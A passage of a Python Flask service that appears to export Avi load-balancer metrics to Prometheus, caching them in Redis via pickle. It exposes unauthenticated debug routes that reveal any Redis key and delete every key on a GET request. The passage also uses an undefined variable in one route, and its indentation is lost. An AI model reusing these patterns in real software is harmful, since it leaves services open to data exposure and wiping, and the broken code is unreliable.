_se_runtime = pickle.loads(r.get('se_runtime'))
if 'runtime' in d:
if request.args.get('runtime').lower() == 'true':
for t in _tenant_dict:
_se_runtime[t] = time.time()
_removal = []
for t in _se_runtime:
if (time.time() - _se_runtime[t]) > (metric_refresh_interval*2):
_removal.append(t)
for t in _removal:
_se_runtime.pop(t, None)
r.set('se_runtime', pickle.dumps(_se_runtime))
#---- define cloud list
_cloud_dict = pickle.loads(r.get('se_cloud'))
for c in cloud_list:
_cloud_dict[c] = time.time()
_removal = []
for c in _cloud_dict:
if (time.time() - _cloud_dict[c]) > (metric_refresh_interval*2):
_removal.append(c)
for c in _removal:
_cloud_dict.pop(c, None)
r.set('se_cloud', pickle.dumps(_cloud_dict))
#---- define uuid list
_uuid_dict = pickle.loads(r.get('se_entity_uuid'))
for u in uuid_list:
_uuid_dict[u] = time.time()
_removal = []
for u in _uuid_dict:
if (time.time() - _uuid_dict[u]) > (metric_refresh_interval*2):
_removal.append(u)
for u in _removal:
_uuid_dict.pop(u, None)
r.set('se_entity_uuid', pickle.dumps(_uuid_dict))
#---- filters metrics from cache to return only what's requested in the Prometheus requests
def serviceengine_filter_metrics(request):
d=request.args.to_dict()
se_metrics = pickle.loads(r.get('se_metrics'))
se_metrics_runtime = pickle.loads(r.get('se_metrics_runtime'))
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
se_metric_list = request.args.get('metric_id').lower()
else:
se_metric_list = default_se_metric_list
se_metric_list = remove_version_specific_metrics('serviceengine',se_metric_list)
_metric_list = se_metric_list.replace('.','_').split(',')
if 'runtime' in d:
if request.args.get('runtime').lower() == 'true':
_metric_list = _metric_list + se_metrics_runtime
#----- filter results based upon request params
list_to_remove = []
#----- filter metrics
for l in se_metrics:
if '# HELP ' in l or '# TYPE ' in l:
if l.split(' ')[2] not in _metric_list:
list_to_remove.append(l)
else:
if l.split(' ')[0] not in _metric_list:
list_to_remove.append(l)
for e in list_to_remove:
se_metrics.remove(e)
#----- filter by UUID
if uuid_list !='*':
list_to_remove = []
for l in se_metrics:
if "# " not in l:
if l.split('uuid="')[1].split('"',1)[0] not in uuid_list:
list_to_remove.append(l)
for e in list_to_remove:
se_metrics.remove(e)
#----- filter by tenant
else:
list_to_remove = []
for l in se_metrics:
if "# " not in l:
if l.split('tenant="')[1].split('"',1)[0] not in tenant_list:
list_to_remove.append(l)
for e in list_to_remove:
se_metrics.remove(e)
#----- filter by cloud
if '*' not in cloud_list:
list_to_remove = []
for l in se_metrics:
if "# " not in l:
if l.split('cloud="')[1].split('"',1)[0] not in cloud_list:
list_to_remove.append(l)
for e in list_to_remove:
se_metrics.remove(e)
#----- remove emtpy comment lines
list_to_remove = []
_mlist = []
for l in se_metrics:
if "# " not in l:
_mlist.append(l.split(' ')[0])
for l in se_metrics:
if "# " in l:
if l.split(' ')[2] not in _mlist:
list_to_remove.append(l)
if len(list_to_remove) > 0:
for e in list_to_remove:
se_metrics.remove(e)
#-----
se_metrics.append('\n')
se_metrics = '\n'.join(se_metrics)
return se_metrics
def serviceengine_metrics(request):
try:
if r.get('se_last_poll_time') == None:
r.set('se_last_poll_time', (time.time()-(metric_refresh_interval+10)))
if r.get('se_last_poll_start_time') == None:
r.set('se_last_poll_start_time', (time.time()-(metric_refresh_interval+20)))
if r.get('se_metrics') == None:
r.set('se_metrics',pickle.dumps([]))
if r.get('se_metrics_runtime') == None:
r.set('se_metrics_runtime',pickle.dumps([]))
if r.get('se_polling') == None:
r.set('se_polling', 'False')
if time.time() - float(r.get('se_last_poll_start_time')) > metric_refresh_interval and r.get('se_polling') == 'False':
r.set('se_polling','True')
serviceengine_metrics_params(request)
if wait_for_cache == False:
se_metrics = serviceengine_filter_metrics(request)
p = Process(target = serviceengine_static.refresh_serviceengine_metrics, args = (r,login,avi_controller,))
p.start()
else:
serviceengine_static.refresh_serviceengine_metrics(r,login,avi_controller)
se_metrics = serviceengine_filter_metrics(request)
return se_metrics
else:
print(str(datetime.now())+' =====> Using cached Serviceengine metrics')
serviceengine_metrics_params(request)
se_metrics = serviceengine_filter_metrics(request)
if time.time() - float(r.get('se_last_poll_time')) > (metric_refresh_interval * 2):
r.set('se_metrics',pickle.dumps([]))
if r.get('se_polling') == 'True':
r.set('se_polling', 'False')
return se_metrics
except:
print(str(datetime.now())+' '+avi_controller+': func serviceengine_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#---------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#----- Virtual service statistics - STATIC prometheus setup
#----- build lists for requested params, allows for multiple jobs servers to scrape different metrics
def virtualservice_metrics_params(request):
if r.get('vs_entity_uuid') == None:
r.set('vs_entity_uuid',pickle.dumps({}))
if r.get('vs_metric_id') == None:
r.set('vs_metric_id',pickle.dumps({}))
if r.get('vs_tenant') == None:
r.set('vs_tenant',pickle.dumps({}))
if r.get('vs_cloud') == None:
r.set('vs_cloud',pickle.dumps({}))
d=request.args.to_dict()
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
metric_id = request.args.get('metric_id').lower()
else:
metric_id = default_vs_metric_list
vs_metric_list = remove_version_specific_metrics('virtualservice',metric_id)
_metric_list = vs_metric_list.split(',')
#---- define metric id list
_vs_metric_id = pickle.loads(r.get('vs_metric_id'))
for m in _metric_list:
_vs_metric_id[m] = time.time()
_removal = []
for m in _vs_metric_id:
if (time.time() - _vs_metric_id[m]) > (metric_refresh_interval*2):
_removal.append(m)
for m in _removal:
_vs_metric_id.pop(m, None)
r.set('vs_metric_id', pickle.dumps(_vs_metric_id))
#---- define tenant list
_tenant_dict = pickle.loads(r.get('vs_tenant'))
for t in tenant_list:
_tenant_dict[t] = time.time()
_removal = []
for t in _tenant_dict:
if (time.time() - _tenant_dict[t]) > (metric_refresh_interval*2):
_removal.append(t)
for t in _removal:
_tenant_dict.pop(t, None)
r.set('vs_tenant', pickle.dumps(_tenant_dict))
#---- define cloud list
_cloud_dict = pickle.loads(r.get('vs_cloud'))
for c in cloud_list:
_cloud_dict[c] = time.time()
_removal = []
for c in _cloud_dict:
if (time.time() - _cloud_dict[c]) > (metric_refresh_interval*2):
_removal.append(c)
for c in _removal:
_cloud_dict.pop(c, None)
r.set('vs_cloud', pickle.dumps(_cloud_dict))
#---- define uuid list
_uuid_dict = pickle.loads(r.get('vs_entity_uuid'))
for u in uuid_list:
_uuid_dict[u] = time.time()
_removal = []
for u in _uuid_dict:
if (time.time() - _uuid_dict[u]) > (metric_refresh_interval*2):
_removal.append(u)
for u in _removal:
_uuid_dict.pop(u, None)
r.set('vs_entity_uuid', pickle.dumps(_uuid_dict))
#---- filters metrics from cache to return only what's requested in the Prometheus requests
def virtualservice_filter_metrics(request):
d=request.args.to_dict()
vs_metrics = pickle.loads(r.get('vs_metrics'))
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
vs_metric_list = request.args.get('metric_id').lower()
else:
vs_metric_list = default_vs_metric_list
vs_metric_list = remove_version_specific_metrics('virtualservice',vs_metric_list)
_metric_list = vs_metric_list.replace('.','_').split(',')
#----- filter results based upon request params
list_to_remove = []
#----- filter metrics
for l in vs_metrics:
if '# HELP ' in l or '# TYPE ' in l:
if l.split(' ')[2] not in _metric_list:
list_to_remove.append(l)
else:
if l.split(' ')[0] not in _metric_list:
list_to_remove.append(l)
for e in list_to_remove:
vs_metrics.remove(e)
#----- filter by UUID
if uuid_list !='*':
list_to_remove = []
for l in vs_metrics:
if "# " not in l:
if l.split('uuid="')[1].split('"',1)[0] not in uuid_list:
list_to_remove.append(l)
for e in list_to_remove:
vs_metrics.remove(e)
#----- filter by tenant
else:
list_to_remove = []
for l in vs_metrics:
if "# " not in l:
if l.split('tenant="')[1].split('"',1)[0] not in tenant_list:
list_to_remove.append(l)
for e in list_to_remove:
vs_metrics.remove(e)
#----- filter by cloud
if '*' not in cloud_list:
list_to_remove = []
for l in vs_metrics:
if "# " not in l:
if l.split('cloud="')[1].split('"',1)[0] not in cloud_list:
list_to_remove.append(l)
for e in list_to_remove:
vs_metrics.remove(e)
#----- remove emtpy comment lines
list_to_remove = []
_mlist = []
for l in vs_metrics:
if "# " not in l:
_mlist.append(l.split(' ')[0])
for l in vs_metrics:
if "# " in l:
if l.split(' ')[2] not in _mlist:
list_to_remove.append(l)
if len(list_to_remove) > 0:
for e in list_to_remove:
vs_metrics.remove(e)
#-----
vs_metrics.append('\n')
vs_metrics = '\n'.join(vs_metrics)
return vs_metrics
#----------
def virtualservice_metrics(request):
try:
if r.get('vs_last_poll_time') == None:
r.set('vs_last_poll_time', (time.time()-(metric_refresh_interval+10)))
if r.get('vs_last_poll_start_time') == None:
r.set('vs_last_poll_start_time', (time.time()-(metric_refresh_interval+20)))
if r.get('vs_metrics') == None:
r.set('vs_metrics',pickle.dumps([]))
if r.get('vs_polling') == None:
r.set('vs_polling', 'False')
if time.time() - float(r.get('vs_last_poll_start_time')) > metric_refresh_interval and r.get('vs_polling') == 'False':
r.set('vs_polling','True')
virtualservice_metrics_params(request)
if wait_for_cache == False:
vs_metrics = virtualservice_filter_metrics(request)
p = Process(target = virtualservice_static.refresh_vs_metrics, args = (r,login,avi_controller,))
p.start()
else:
virtualservice_static.refresh_vs_metrics(r,login,avi_controller)
vs_metrics = virtualservice_filter_metrics(request)
return vs_metrics
else:
print(str(datetime.now())+' =====> Using cached Virtualservice metrics')
virtualservice_metrics_params(request)
vs_metrics = virtualservice_filter_metrics(request)
if time.time() - float(r.get('vs_last_poll_time')) > (metric_refresh_interval * 2):
r.set('vs_metrics',pickle.dumps([]))
if r.get('vs_polling') == 'True':
r.set('vs_polling', 'False')
return vs_metrics
except:
print(str(datetime.now())+' '+avi_controller+': func virtualservice_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#---------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#----- Virtual service statistics - Prometheus service discovery
def update_servicediscovery_targets(request):
try:
if r.get('sd_targets') == None:
r.set('sd_targets',pickle.dumps({}))
if r.get('sd_names') == None:
r.set('sd_names', pickle.dumps({}))
sd_names = pickle.loads(r.get('sd_names'))
sd_targets = pickle.loads(r.get('sd_targets'))
d=request.args.to_dict()
tenant = request.args.get('kubernetes_namespace')
vs_name = request.args.get('virtualservice')
if 'metric_id' in d:
sd_metric_list = request.args.get('metric_id').lower()
else:
sd_metric_list = default_vs_metric_list
if tenant not in sd_names:
sd_names[tenant] = {}
if 'extra_metrics' in d:
extra_metrics = request.args.get('extra_metrics')
sd_metric_list = (sd_metric_list+','+extra_metrics).replace(' ','')
sd_metric_list = remove_version_specific_metrics('virtualservice',sd_metric_list)
sd_metric_list = sd_metric_list.split(',')
#---- remove unneccesary metrics
if vs_name in sd_names[tenant]:
uuid = sd_names[tenant][vs_name]
sd_targets[uuid]['vs_metric_list'] = sd_metric_list
r.set('sd_targets',pickle.dumps(sd_targets))
else:
print(str(datetime.now())+' =====> New VS discovered: %s' %vs_name)
resp = avi_request('virtualservice?name=%s&fields=cloud_ref,tenant_ref&include_name=true' %vs_name, tenant)
if resp.status_code == 200:
if resp.json()['count'] == 1:
cloud = resp.json()['results'][0]['cloud_ref'].split('#')[1]
entity_uuid = resp.json()['results'][0]['uuid']
temp_name = resp.json()['results'][0]['name']
sd_names[tenant][temp_name] = entity_uuid
r.set('sd_names', pickle.dumps(sd_names))
sd_targets[entity_uuid] = {'vs_metric_list': sd_metric_list, 'cloud': cloud, 'lastquery': time.time(), 'lastresponse': time.time()}
r.set('sd_targets', pickle.dumps(sd_targets))
else:
print(str(datetime.now())+' =====> ERROR update_servicediscovery_targets: %s' %resp.text)
return ['ERROR',resp.status_code,resp.text]
return ['SUCCESS']
except:
print(str(datetime.now())+' '+avi_controller+': func update_servicediscovery_targets encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#----------
#----------
def virtualservice_servicediscovery_metrics(request):
try:
if r.get('sd_polling') == None:
r.set('sd_polling','False')
if r.get('sd_last_poll_time') == None:
r.set('sd_last_poll_time',(time.time()-(metric_refresh_interval+10)))
if r.get('sd_last_poll_start_time') == None:
r.set('sd_last_poll_start_time',(time.time()-(metric_refresh_interval+20)))
if r.get('sd_metrics') == None:
r.set('sd_metrics', pickle.dumps([]))
status = update_servicediscovery_targets(request)
if status[0] != 'SUCCESS':
return status[0]+'|'+str(status[1])+'|'+status[2]
else:
if time.time() - float(r.get('sd_last_poll_start_time')) > metric_refresh_interval and r.get('sd_polling') == 'False':
r.set('sd_polling','True')
if wait_for_cache == False:
p = Process(target = servicediscovery.update_servicediscovery_metric_cache_multiprocess, args = (r,login,avi_controller,metric_refresh_interval,))
p.start()
else:
servicediscovery.update_servicediscovery_metric_cache_multiprocess(r,login,avi_controller,metric_refresh_interval)
else:
print(str(datetime.now())+' =====> Using cached Servicediscovery metrics')
sd_names = pickle.loads(r.get('sd_names'))
sd_targets = pickle.loads(r.get('sd_targets'))
sd_metrics = pickle.loads(r.get('sd_metrics'))
tenant = request.args.get('kubernetes_namespace')
vs_name = request.args.get('virtualservice')
uuid = sd_names[tenant][vs_name]
#prom_metrics = ''
prom_metrics = ['\n']
for s in sd_metrics:
for v in s:
if v == uuid:
for m in s[v]:
if 'data' in m:
temp_tags = ''
#----- check is metric is desired for the vs
if m['header']['name'] in sd_targets[uuid]['vs_metric_list']:
metric_name = m['header']['name'].replace('.','_').replace('-','_')
metric_description = m['header']['metric_description']
metric_value = m['data'][0]['value']
temp_payload = {}
temp_payload['name'] = vs_name
temp_payload['uuid'] = uuid
temp_payload['cloud'] = sd_targets[uuid]['cloud']
temp_payload['tenant'] = tenant
temp_payload['entity_type'] = 'virtualservice'
for e in temp_payload:
temp_tags=temp_tags+(str(e+'="'+temp_payload[e]+'",'))
temp_tags = '{'+temp_tags.rstrip(',')+'}'
#prom_metrics = prom_metrics+'\n'+'# HELP '+metric_name+' '+metric_description
#prom_metrics = prom_metrics+'\n'+'# TYPE '+metric_name+' gauge'
#prom_metrics = prom_metrics+'\n'+metric_name+''+temp_tags+' '+str(metric_value)
prom_metrics.append('%s 01# HELP %s %s' %(metric_name,metric_name, metric_description))
prom_metrics.append('%s 02# TYPE %s gauge' %(metric_name,metric_name))
prom_metrics.append('%s %s %s' %(metric_name,temp_tags,str(metric_value)))
sd_targets[uuid]['lastquery'] = time.time()
sd_targets[uuid]['lastresponse'] = time.time()
r.set('sd_targets',pickle.dumps(sd_targets))
#prom_metrics = prom_metrics+'\n'
prom_metrics = list(set(prom_metrics))
prom_metrics = sorted(prom_metrics)
for idx, item in enumerate(prom_metrics):
if '01#' in item:
item = item.split('01',1)[1]
prom_metrics[idx] = item
elif '02#' in item:
item = item.split('02',1)[1]
prom_metrics[idx] = item
prom_metrics.append('\n')
prom_metrics = '\n'.join(prom_metrics)
if time.time() - float(r.get('sd_last_poll_time')) > (metric_refresh_interval * 2):
r.set('sd_metrics',pickle.dumps(''))
if r.get('sd_polling') == 'True':
r.set('sd_polling', 'False')
return prom_metrics
except:
r.set('sd_polling','False')
print(str(datetime.now())+' '+avi_controller+': func virtualservice_servicediscovery_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#---------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#----- Pool statistics
#----- build lists for requested params, allows for multiple jobs servers to scrape different metrics
def pool_metrics_params(request):
if r.get('pool_entity_uuid') == None:
r.set('pool_entity_uuid',pickle.dumps({}))
if r.get('pool_metric_id') == None:
r.set('pool_metric_id',pickle.dumps({}))
if r.get('pool_tenant') == None:
r.set('pool_tenant',pickle.dumps({}))
if r.get('pool_cloud') == None:
r.set('pool_cloud',pickle.dumps({}))
d=request.args.to_dict()
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
metric_id = request.args.get('metric_id').lower()
else:
metric_id = default_pool_metric_list
pool_metric_list = remove_version_specific_metrics('pool',metric_id)
_metric_list = pool_metric_list.split(',')
#---- define metric id list
_pool_metric_id = pickle.loads(r.get('pool_metric_id'))
for m in _metric_list:
_pool_metric_id[m] = time.time()
_removal = []
for m in _pool_metric_id:
if (time.time() - _pool_metric_id[m]) > (metric_refresh_interval*2):
_removal.append(m)
for m in _removal:
_pool_metric_id.pop(m, None)
r.set('pool_metric_id', pickle.dumps(_pool_metric_id))
#---- define tenant list
_tenant_dict = pickle.loads(r.get('pool_tenant'))
for t in tenant_list:
_tenant_dict[t] = time.time()
_removal = []
for t in _tenant_dict:
if (time.time() - _tenant_dict[t]) > (metric_refresh_interval*2):
_removal.append(t)
for t in _removal:
_tenant_dict.pop(t, None)
r.set('pool_tenant', pickle.dumps(_tenant_dict))
#---- define cloud list
_cloud_dict = pickle.loads(r.get('pool_cloud'))
for c in cloud_list:
_cloud_dict[c] = time.time()
_removal = []
for c in _cloud_dict:
if (time.time() - _cloud_dict[c]) > (metric_refresh_interval*2):
_removal.append(c)
for c in _removal:
_cloud_dict.pop(c, None)
r.set('pool_cloud', pickle.dumps(_cloud_dict))
#---- define uuid list
_uuid_dict = pickle.loads(r.get('pool_entity_uuid'))
for u in uuid_list:
_uuid_dict[u] = time.time()
_removal = []
for u in _uuid_dict:
if (time.time() - _uuid_dict[u]) > (metric_refresh_interval*2):
_removal.append(u)
for u in _removal:
_uuid_dict.pop(u, None)
r.set('pool_entity_uuid', pickle.dumps(_uuid_dict))
#---- filters metrics from cache to return only what's requested in the Prometheus requests
def pool_filter_metrics(request):
d=request.args.to_dict()
pool_metrics = pickle.loads(r.get('pool_metrics'))
tenant_list,cloud_list,uuid_list = generate_params_list(request)
if 'metric_id' in d:
pool_metric_list = request.args.get('metric_id').lower()
else:
pool_metric_list = default_pool_metric_list
pool_metric_list = remove_version_specific_metrics('pool',pool_metric_list)
_metric_list = pool_metric_list.replace('.','_').split(',')
#----- filter results based upon request params
list_to_remove = []
#----- filter metrics
for l in pool_metrics:
if '# HELP ' in l or '# TYPE ' in l:
if l.split(' ')[2] not in _metric_list:
list_to_remove.append(l)
else:
if l.split(' ')[0] not in _metric_list:
list_to_remove.append(l)
for e in list_to_remove:
pool_metrics.remove(e)
#----- filter by UUID
if uuid_list !='*':
list_to_remove = []
for l in pool_metrics:
if "# " not in l:
if l.split('uuid="')[1].split('"',1)[0] not in uuid_list:
list_to_remove.append(l)
for e in list_to_remove:
pool_metrics.remove(e)
#----- filter by tenant
else:
list_to_remove = []
for l in pool_metrics:
if "# " not in l:
if l.split('tenant="')[1].split('"',1)[0] not in tenant_list:
list_to_remove.append(l)
for e in list_to_remove:
pool_metrics.remove(e)
#----- filter by cloud
if '*' not in cloud_list:
list_to_remove = []
for l in pool_metrics:
if "# " not in l:
if l.split('cloud="')[1].split('"',1)[0] not in cloud_list:
list_to_remove.append(l)
for e in list_to_remove:
pool_metrics.remove(e)
#----- remove emtpy comment lines
list_to_remove = []
_mlist = []
for l in pool_metrics:
if "# " not in l:
_mlist.append(l.split(' ')[0])
for l in pool_metrics:
if "# " in l:
if l.split(' ')[2] not in _mlist:
list_to_remove.append(l)
if len(list_to_remove) > 0:
for e in list_to_remove:
pool_metrics.remove(e)
#-----
pool_metrics.append('\n')
pool_metrics = '\n'.join(pool_metrics)
return pool_metrics
def pool_metrics(request):
try:
if r.get('pool_last_poll_time') == None:
r.set('pool_last_poll_time', (time.time()-(metric_refresh_interval+10)))
if r.get('pool_last_poll_start_time') == None:
r.set('pool_last_poll_start_time', (time.time()-(metric_refresh_interval+20)))
if r.get('pool_metrics') == None:
r.set('pool_metrics',pickle.dumps([]))
if r.get('pool_polling') == None:
r.set('pool_polling', 'False')
if time.time() - float(r.get('pool_last_poll_start_time')) > metric_refresh_interval and r.get('pool_polling') == 'False':
pool_metrics_params(request)
if wait_for_cache == False:
pool_metrics = pool_filter_metrics(request)
p = Process(target = pool_static.refresh_pool_metrics, args = (r,login,avi_controller,))
p.start()
else:
pool_static.refresh_pool_metrics(r,login,avi_controller)
pool_metrics = pool_filter_metrics(request)
return pool_metrics
else:
print(str(datetime.now())+' =====> Using cached Pool metrics')
pool_metrics_params(request)
pool_metrics = pool_filter_metrics(request)
#pool_metrics = pickle.loads(r.get('pool_metrics'))
if time.time() - float(r.get('pool_last_poll_time')) > (metric_refresh_interval * 2):
r.set('pool_metrics',pickle.dumps([]))
if r.get('pool_polling') == 'True':
r.set('pool_polling', 'False')
return pool_metrics
except:
r.set('pool_polling','False')
print(str(datetime.now())+' '+avi_controller+': func pool_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#---------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#----- GET controller Member specific statistics
#----- build lists for requested params, allows for multiple jobs servers to scrape different metrics
def controller_metrics_params(request):
if r.get('ctl_metric_id') == None:
r.set('ctl_metric_id',pickle.dumps({}))
if r.get('ctl_runtime') == None:
r.set('ctl_runtime',pickle.dumps({}))
d=request.args.to_dict()
if 'metric_id' in d:
metric_id = request.args.get('metric_id').lower()
else:
metric_id = default_controller_metric_list
controller_metric_list = remove_version_specific_metrics('controller',metric_id)
_metric_list = controller_metric_list.split(',')
#---- define metric id list
_controller_metric_id = pickle.loads(r.get('ctl_metric_id'))
for m in _metric_list:
_controller_metric_id[m] = time.time()
_removal = []
for m in _controller_metric_id:
if (time.time() - _controller_metric_id[m]) > (metric_refresh_interval*2):
_removal.append(m)
for m in _removal:
_controller_metric_id.pop(m, None)
r.set('ctl_metric_id', pickle.dumps(_controller_metric_id))
#---- define ctl runtime
_ctl_runtime = pickle.loads(r.get('ctl_runtime'))
if 'runtime' in d:
if request.args.get('runtime').lower() == 'true':
_ctl_runtime['true'] = time.time()
_removal = []
for t in _ctl_runtime:
if (time.time() - _ctl_runtime[t]) > (metric_refresh_interval*2):
_removal.append(t)
for t in _removal:
_ctl_runtime.pop(t, None)
r.set('ctl_runtime', pickle.dumps(_ctl_runtime))
#---- filters metrics from cache to return only what's requested in the Prometheus requests
def controller_filter_metrics(request):
ctl_metrics = pickle.loads(r.get('ctl_metrics'))
ctl_metrics_runtime = pickle.loads(r.get('ctl_metrics_runtime'))
d=request.args.to_dict()
if 'metric_id' in d:
ctl_metric_list = request.args.get('metric_id').lower()
else:
ctl_metric_list = default_controller_metric_list
ctl_metric_list = remove_version_specific_metrics('controller',ctl_metric_list)
_metric_list = ctl_metric_list.replace('.','_').split(',')
if 'runtime' in d:
if request.args.get('runtime').lower() == 'true':
_metric_list = _metric_list + ctl_metrics_runtime
#----- filter results based upon request params
list_to_remove = []
#----- filter metrics
for l in ctl_metrics:
if '# HELP ' in l or '# TYPE ' in l:
if l.split(' ')[2] not in _metric_list:
list_to_remove.append(l)
else:
if l.split(' ')[0] not in _metric_list:
list_to_remove.append(l)
for e in list_to_remove:
ctl_metrics.remove(e)
ctl_metrics.append('\n')
ctl_metrics = '\n'.join(ctl_metrics)
return ctl_metrics
def controller_metrics(request):
try:
if r.get('ctl_last_poll_time') == None:
r.set('ctl_last_poll_time', (time.time()-(metric_refresh_interval+10)))
if r.get('ctl_last_poll_start_time') == None:
r.set('ctl_last_poll_start_time', (time.time()-(metric_refresh_interval+20)))
if r.get('ctl_metrics') == None:
r.set('ctl_metrics',pickle.dumps([]))
if r.get('ctl_polling') == None:
r.set('ctl_polling', 'False')
if r.get('ctl_metrics_runtime') == None:
r.set('ctl_metrics_runtime',pickle.dumps([]))
if time.time() - float(r.get('ctl_last_poll_start_time')) > metric_refresh_interval and r.get('ctl_polling') == 'False':
r.set('ctl_polling','True')
controller_metrics_params(request)
if wait_for_cache == False:
ctl_metrics = controller_filter_metrics(request)
p = Process(target = controller_static.refresh_ctl_metrics, args = (r,login,avi_controller,))
p.start()
else:
controller_static.refresh_ctl_metrics(r,login,avi_controller)
ctl_metrics = controller_filter_metrics(request)
return ctl_metrics
else:
print(str(datetime.now())+' =====> Using cached Controller metrics')
controller_metrics_params(request)
ctl_metrics = controller_filter_metrics(request)
if time.time() - float(r.get('ctl_last_poll_time')) > (metric_refresh_interval * 2):
r.set('ctl_metrics',pickle.dumps([]))
if r.get('ctl_polling') == 'True':
r.set('ctl_polling', 'False')
return ctl_metrics
except:
r.set('ctl_polling', 'False')
print(str(datetime.now())+' '+avi_controller+': func controller_cluster_metrics encountered an error encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return False
#---------------------------------------------------------------------------------------------------------
#-----------------------------------
#-------------------------
app = Flask(__name__)
@app.route('/metrics', methods=['GET'])
def add_message():
try:
req_start_time = time.time()
d=request.args.to_dict()
avi_login()
if request.args.get('entity_type').lower() == 'virtualservice':
if 'kubernetes_namespace' in d:
metrics = virtualservice_servicediscovery_metrics(request)
else:
metrics = virtualservice_metrics(request)
#print metrics
elif request.args.get('entity_type').lower() == 'serviceengine':
metrics = serviceengine_metrics(request)
#print metrics
elif request.args.get('entity_type').lower() == 'controller':
metrics = controller_metrics(request)
#print metrics
elif request.args.get('entity_type').lower() == 'pool':
metrics = pool_metrics(request)
#print metrics
else:
return '', 500
req_total_time = str(time.time()-req_start_time)
print(str(datetime.now())+' =====> request took '+req_total_time+' seconds\n')
if metrics == False:
return '', 500
elif metrics.split('|')[0] == 'ERROR':
return metrics.split('|')[2], int(metrics.split('|')[1])
else:
return metrics, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
@app.route('/virtualservice_debug', methods=['GET'])
def vs_debug():
try:
_1 = '\n<p>=====> Last Polling Time %s</p>\n' %time.ctime(float(r.get('vs_last_poll_time')))
_2 = '\n<p>=====></p>\n'
_3 = '\n<p>'+str(pickle.loads(r.get('vs_results')))+'</p>\n'
_4 = '\n<p>'+str(pickle.loads(r.get('vs_metrics')))+'</p>\n'
_5 = '\n<p>=====> VS without METRICS %s</p>\n' %str(pickle.loads(r.get('vs_missing_metrics')))
response = _1+_3+_4+_5
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Virtualservice metrics polling hasn't run yet\n", 200
@app.route('/servicediscovery_debug', methods=['GET'])
def sd_debug():
try:
_1 = '\n<p>=====> Last Polling Time %s</p>\n' %time.ctime(float(r.get('sd_last_poll_time')))
_2 = '\n<p>=====></p>\n'
_3 = '\n<p>'+str(pickle.loads(r.get('sd_names')))+'</p>\n'
_4 = '\n<p>'+str(pickle.loads(r.get('sd_targets')))+'</p>\n'
_5 = '\n<p>'+str(pickle.loads(r.get('sd_metrics')))+'</p>\n'
response = _1+_3+_4+_5
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Servicediscovery metrics polling hasn't run yet\n", 200
@app.route('/serviceengine_debug', methods=['GET'])
def se_debug():
try:
_1 = '\n<p>=====> Last Polling Time %s</p>\n' %time.ctime(float(r.get('se_last_poll_time')))
_2 = '=====>'
_3 = '\n<p>'+str(pickle.loads(r.get('se_results')))+'</p>\n'
_4 = '\n</p>'+str(pickle.loads(r.get('se_metrics')))+'</p>\n'
_5 = '\n<p>=====> Serviceengine without METRICS %s</p>\n' %str(pickle.loads(r.get('se_missing_metrics')))
response = _1+_3+_4+_5
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Serviceengine metrics polling hasn't run yet\n", 200
@app.route('/pool_debug', methods=['GET'])
def pool_debug():
try:
_1 = '\n<p>=====> Last Polling Time %s</p>\n' %time.ctime(float(r.get('pool_last_poll_time')))
_2 = '=====>'
_3 = '\n<p>'+str(pickle.loads(r.get('pool_results')))+'</p>\n'
_4 = '\n</p>'+str(pickle.loads(r.get('pool_metrics')))+'</p>\n'
_5 = '\n<p>=====> Pools without METRICS %s</p>\n' %str(pickle.loads(r.get('pool_missing_metrics')))
response = _1+_3+_4+_5
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Pool metrics polling hasn't run yet\n", 200
@app.route('/redis_debug', methods=['GET'])
def redis_debug():
try:
d=request.args.to_dict()
if 'key' in d:
key = request.args.get('key').lower()
try:
value = str(pickle.loads(r.get(key)))
except:
value = str(r.get(key))
_1 = '\n<p>=====> Redis Key %s</p>\n' %key
_2 = value+'</p>\n'
response = _1+_2
return response, 200
else:
_1 = '\n<p>=====> All Redis Keys </p>\n'
response = []
for key in r.scan_iter("*"):
response.append(key)
response = sorted(response)
response.remove('avi_login')
response = ('\n'.join(response))+'\n'
response = _1+response
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Redis Debug has an error\n", 500
@app.route('/redis_delete', methods=['GET'])
def redis_delete():
try:
d=request.args.to_dict()
if 'key' in d:
key = request.args.get('key').lower()
r.delete(key)
_1 = '\n<p>=====> Deleted Redis Key %s</p>\n' %key
_2 = value+'</p>\n'
response = _1+_2
return response, 200
else:
_1 = '\n<p>=====> Deleted All Redis Keys </p>\n'
response = []
for key in r.scan_iter("*"):
response.append(key)
r.delete(key)
response = sorted(response)
if 'avi_login' in response:
response.remove('avi_login')
response = ('\n'.join(response))+'\n'
response = _1+response
return response, 200
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
return "=====> Redis Flush has an error\n", 500
try:
r = redis.Redis(host='localhost', port=6379, db=0)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8080, threaded=True)
except:
